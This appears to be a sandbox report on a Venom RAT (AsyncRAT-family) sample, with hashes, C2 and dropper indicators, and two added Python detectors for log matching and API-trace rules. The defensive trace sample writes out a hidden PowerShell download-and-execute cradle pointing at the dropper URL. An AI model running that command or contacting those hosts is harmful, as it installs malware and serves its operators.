General

  • Target

    JaffaCakes118_1ae61cdab60648d667193e685b440256e0f96485269a01701c63ab5bcbcc4308

  • Size

    121KB

  • Sample

    241224-lqytcsvjam

  • MD5

    5e47326c7bd6ed925778368b4af67303

  • SHA1

    dc182f9e8572bdc875f7c45f6eb65d0eaaf9dabd

  • SHA256

    1ae61cdab60648d667193e685b440256e0f96485269a01701c63ab5bcbcc4308

  • SHA512

    671fae719294179f97e5d3df6705208871c1696798a18362864aac5aa40cafda1a36b4f9408753ee5f56be77ea90ddf405cde0a60aba1a4aaec0ec8062437144

  • SSDEEP

    3072:SfL8o1nfPjVW8EXyBhri6yOEFAXdnGwMWn9V0qTMU:CL8WfhwXiiT6nBMWjR1

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT 5.0.5

Botnet

Venom Clients

C2

ry8325585.duckdns.org:6087

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
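
The configuration above gives the C2 as a dynamic-DNS name and a port, not an address. As an added example (not part of this report or of the RAT), the following matcher takes that host:port and runs over a few constructed DNS and connection log lines; it learns the resolved address from DNS answers in the same log and then attributes later connections to it. The log line format, every client, timestamp and answer address, and the dynamic-DNS suffix list are assumptions made for illustration; only `ry8325585.duckdns.org` and `6087` come from the extracted config.

```python
"""Match the extracted C2 (host:port) against DNS and connection logs.

Added example, not part of the sandbox report or of the RAT.  The log format is
constructed for illustration, one event per line:
    <timestamp> dns  <client> <queried-name> <answer-ip>
    <timestamp> conn <client> <dst-ip>:<dst-port>
"""
import re
from dataclasses import dataclass

# From the extracted config on this page.
C2_HOST = "ry8325585.duckdns.org"
C2_PORT = 6087

# Dynamic-DNS suffixes worth flagging on their own (assumption: illustrative list).
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")

# Constructed sample log.  Addresses are from the TEST-NET-3 documentation
# range, not real resolutions of the C2 name.
SAMPLE_LOG = """\
2024-12-24T11:40:01Z dns  10.0.0.5 www.example.com 203.0.113.50
2024-12-24T11:40:03Z dns  10.0.0.5 ry8325585.duckdns.org 203.0.113.7
2024-12-24T11:40:04Z conn 10.0.0.5 203.0.113.7:6087
2024-12-24T11:41:10Z dns  10.0.0.9 other-host.duckdns.org 203.0.113.9
2024-12-24T11:41:11Z conn 10.0.0.9 203.0.113.9:443
2024-12-24T11:42:00Z conn 10.0.0.5 203.0.113.50:443
2024-12-24T11:43:30Z conn 10.0.0.11 203.0.113.7:8080
"""

DNS_RE = re.compile(r"^(\S+)\s+dns\s+(\S+)\s+(\S+)\s+(\S+)$")
CONN_RE = re.compile(r"^(\S+)\s+conn\s+(\S+)\s+(\S+):(\d+)$")


@dataclass
class Hit:
    ts: str
    client: str
    kind: str      # c2_dns | c2_conn | c2_conn_other_port | dyndns
    detail: str


def scan(log_text):
    """Return Hits for lines tied to the C2 or to dynamic-DNS use.

    The config gives a DDNS name, not an address, so the C2 IP is learned from
    DNS answers in the same log and later connections are attributed to it.
    """
    c2_ips = set()
    hits = []
    for line in log_text.splitlines():
        m = DNS_RE.match(line)
        if m:
            ts, client, name, answer = m.groups()
            name = name.lower().rstrip(".")
            if name == C2_HOST:
                c2_ips.add(answer)
                hits.append(Hit(ts, client, "c2_dns", f"{name} -> {answer}"))
            elif name.endswith(DYNDNS_SUFFIXES):
                hits.append(Hit(ts, client, "dyndns", name))
            continue
        m = CONN_RE.match(line)
        if m:
            ts, client, dst, port = m.groups()
            if dst not in c2_ips:
                continue
            # Same address on another port is still reported, just separately.
            kind = "c2_conn" if int(port) == C2_PORT else "c2_conn_other_port"
            hits.append(Hit(ts, client, kind, f"{dst}:{port}"))
    return hits


def infected_clients(log_text):
    """Clients seen connecting to a resolved C2 address on the configured port."""
    return sorted({h.client for h in scan(log_text) if h.kind == "c2_conn"})


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h.ts, h.client, h.kind, h.detail)
    print("infected:", infected_clients(SAMPLE_LOG))
```

The matcher is order-dependent by design: a connection to the C2 address is only attributed if a resolution of the C2 name was seen earlier in the same log, so run it over DNS and connection records merged in time order.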

Extracted

Language

ps1

Deobfuscated

URLs

  • ps1.dropper

    https://schoolcrypter.com/dll_startup

Targets

    • Target

      RVF001.EXE

    • Size

      300.0MB

    • MD5

      fdd6bb2ce995b36d49d3196894192988

    • SHA1

      9e8b9db35c796ccd6622771ffc5d333038d3333d

    • SHA256

      a09c85265ae57ce325328a06925d3fbc61021f2ca815d00858c3024ab6f8e3a8

    • SHA512

      e337f94b47930a8e01ef4877a45578c9e1bf430111a6c27de03f50cee599717e4c0605f01f41d70b2123ef3bf12fb695893965876cd90ac4a17746dc8b7389e2

    • SSDEEP

      3072:9q1IYuRXuhcSOY/hQ6d1XmRsDvHt02pWJJ67rmvHszvTBFUa:UyY6TYC6d1XjxpWJmryHszvTBFZ

    • AsyncRat

      AsyncRAT is an open-source remote access trojan written in C#, designed to remotely monitor and control other computers. Venom RAT (the version string reported above) is a derivative of it, which is why the extractor reports the family as asyncrat.

    • Asyncrat family

    • Executes dropped EXE

    • Uses the VBS compiler for execution

    • Suspicious use of SetThreadContext

    • Target

      RVF002.VBS

    • Size

      236KB

    • MD5

      7b474b087d336f766ba4cd74067e2786

    • SHA1

      aac3de5ebd60465dabdd78033637819b68d1e91b

    • SHA256

      92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a

    • SHA512

      e431562d6a08d91075c8498dd88de3c83a7e21bf627263254f3b62e9f9b5493a34f1f942412865e3bd4bc3bcfc4ff2c8f5223aa0fa58601803d1f43451f50dfe

    • SSDEEP

      24:QnODOUWlHllyjOMyE2aL8gVEuMvywFfV7N9Riwnwm43YQ7FYiVLneMDTFv9vPvWE:yKVWtl6OeqyYLQeMHNOSAgHyLKhB

    Score
    10/10
    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Command and Scripting Interpreter: PowerShell

      Runs commands through powershell.exe.
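
The signatures attached to the two targets above (Suspicious use of SetThreadContext, Checks computer location settings, and Command and Scripting Interpreter: PowerShell) each describe an API-call pattern. As an added example, not the sandbox's own signature code, the following detector expresses those three patterns as rules run over a constructed API-call trace: a suspended CreateProcess followed in order by WriteProcessMemory, SetThreadContext and ResumeThread from the same process (the hollowing sequence), a read of a country or locale value under Control Panel\International, and a PowerShell spawn whose command line carries a download cradle. The trace format, pids, handles, the vbc.exe hollow target and the PowerShell command line are assumptions made for illustration; only the ps1.dropper URL comes from this report.

```python
"""Flag the behaviours named in this report in a sandbox API-call trace.

Added example, not the sandbox's own signature code.  Trace format is
constructed for illustration, one call per line:
    <pid> <Api>(<name>=<value>, ...) = <retval> [<name>=<value> ...]
"""
import re

# Constructed trace.  The pids, handles, the hollow target (vbc.exe) and the
# PowerShell command line are assumptions for illustration; only the
# ps1.dropper URL comes from this report.
SAMPLE_TRACE = r"""
1500 CreateProcessW(lpCommandLine="powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://schoolcrypter.com/dll_startup'))", dwCreationFlags=0x8000000) = 1 hProcess=0x1f0 hThread=0x1f4 dwProcessId=1620
1620 CreateProcessW(lpApplicationName="C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe", dwCreationFlags=0x4) = 1 hProcess=0x2a8 hThread=0x2ac dwProcessId=1844
1620 WriteProcessMemory(hProcess=0x2a8, lpBaseAddress=0x400000, nSize=0x1e000) = 1
1620 SetThreadContext(hThread=0x2ac) = 1
1620 ResumeThread(hThread=0x2ac) = 1
1844 RegOpenKeyExW(hKey=HKEY_CURRENT_USER, lpSubKey="Control Panel\International") = 0 phkResult=0x3c0
1844 RegQueryValueExW(hKey=0x3c0, lpValueName="sCountry") = 0
1844 RegCloseKey(hKey=0x3c0) = 0
"""

LINE_RE = re.compile(r"^(\d+)\s+(\w+)\((.*)\)\s*=\s*(\S+)(.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|[^,\s]+)')

CREATE_SUSPENDED = 0x4                      # dwCreationFlags bit
HOLLOW_STEPS = ("WriteProcessMemory", "SetThreadContext", "ResumeThread")
GEOFENCE_KEY = r"control panel\international"
GEOFENCE_VALUES = {"scountry", "icountry", "locale", "localename", "nation"}
CRADLE_RE = re.compile(r"https?://|downloadstring|downloadfile|\biex\b|invoke-expression", re.I)


def parse(trace):
    """Yield (pid, api, args, ret); quotes are stripped, 0x.. and decimal values become ints."""
    for line in trace.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, api, argtext, ret, extra = m.groups()
        args = {}
        for key, val in KV_RE.findall(argtext + " " + extra):
            if val.startswith('"'):
                val = val[1:-1]
            elif val.lower().startswith("0x"):
                val = int(val, 16)
            elif val.isdigit():
                val = int(val)
            args[key] = val
        yield int(pid), api, args, ret


def detect(trace):
    """Return [(pid, description)] for hollowing, geofence lookups and PowerShell stages."""
    hits = []
    hollow = {}           # pid -> index of the next HOLLOW_STEPS call expected
    geo_key_open = set()  # pids that opened Control Panel\International
    for pid, api, args, _ret in parse(trace):
        if api.startswith("CreateProcess"):
            cmd = f"{args.get('lpApplicationName', '')} {args.get('lpCommandLine', '')}"
            if "powershell" in cmd.lower():
                why = "spawns powershell.exe"
                if CRADLE_RE.search(cmd):
                    why += " with a download cradle"
                hits.append((pid, why))
            flags = args.get("dwCreationFlags", 0)
            if isinstance(flags, int) and flags & CREATE_SUSPENDED:
                hollow[pid] = 0           # suspended child: start watching this pid
            continue
        # Hollowing: the three follow-up calls must arrive in order from the same pid.
        step = hollow.get(pid)
        if step is not None and HOLLOW_STEPS[step] in api:
            hollow[pid] = step + 1
            if hollow[pid] == len(HOLLOW_STEPS):
                hits.append((pid, "process hollowing: suspended CreateProcess, "
                                  "WriteProcessMemory, SetThreadContext, ResumeThread"))
                del hollow[pid]
        # Geofence: a country/locale value read from the International key.
        if api.startswith("RegOpenKeyEx") and GEOFENCE_KEY in str(args.get("lpSubKey", "")).lower():
            geo_key_open.add(pid)
        elif api.startswith("RegQueryValueEx") and pid in geo_key_open:
            value = str(args.get("lpValueName", ""))
            if value.lower() in GEOFENCE_VALUES:
                hits.append((pid, f"geofence check: reads {value} from Control Panel\\International"))
    return hits


if __name__ == "__main__":
    for pid, why in detect(SAMPLE_TRACE):
        print(pid, why)
```

The hollowing rule is deliberately strict about order and about the creating process: the three follow-up calls are only counted after a CREATE_SUSPENDED child from the same pid, which is what separates this pattern from a debugger or a legitimate thread-context read. `HOLLOW_STEPS[step] in api` also accepts the Nt/Wow64 variants of those calls, since sandbox traces differ in which layer they hook.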

MITRE ATT&CK Enterprise v15
